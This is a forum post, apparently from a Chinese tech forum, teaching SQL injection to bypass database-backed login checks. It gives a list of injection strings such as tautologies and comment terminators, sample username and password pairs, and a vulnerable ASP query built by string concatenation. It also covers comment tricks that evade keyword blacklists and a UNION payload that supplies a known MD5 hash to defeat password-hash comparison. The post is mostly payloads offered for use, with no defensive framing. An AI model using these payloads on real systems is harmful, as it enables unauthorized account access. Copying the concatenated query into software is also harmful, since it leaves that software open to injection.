| This basic technique for "bypass Login" when application use DB to checking authentication. However, an attacker may possibly bypass this check with SQL injection. [Example scripts] +-----------------------------+ ' or 1=1 -- a' or 1=1 -- " or 1=1 -- a" or 1=1 -- ' or 1=1 # " or 1=1 # or 1=1 -- ' or 'x'='x " or "x"="x ') or ('x'='x ") or ("x"="x ' or username LIKE '%admin% +-----------------------------+ USERNAME: ' or 1/* PASSWORD: */ =1 -- +-----------------------------+ USERNAME: admin' or 'a'='a PASSWORD: '# +-----------------------------+ [Login ASP_code]----------------------------------------------------------------------------------- var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'"; [End Login ASP_code]------------------------------------------------------------------------------- When we input something like this: formusr = admin formpwd = ' or 'a='a [SQL Query]--------------------------------------------------------------------------------- SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a' [End Code]---------------------------------------------------------------------------------- This SQL condition is TRUE and bypass login process, So you don't need admin's password. (Just use ' or 'a'='a) If we input something like this formusr = ' or 1=1 -- formpwd = anything [SQL Query]--------------------------------------------------------------------------------- SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything' [End Code]---------------------------------------------------------------------------------- ** Note ** -- is comment operator of MSSQL DB used to comment out everything following this operator. /*Comment*/ Inline comment, Comments out rest of the query by not closing them / Bypass blacklisting. DROP/*comment*/sampletable DR/**/OP/*bypass blacklisting*/sampletable SELECT/*avoid-spaces*/password/**/FROM/**/Members If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. formusr = admin formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72 1a1dc91c907325c69271ddf0c944bc72 = MD(pass) |
|小黑屋|最新主题|手机版|微赢网络技术论坛
( 苏ICP备08020429号 )
GMT+8, 2024-9-29 19:20 , Processed in 0.263433 second(s), 13 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.
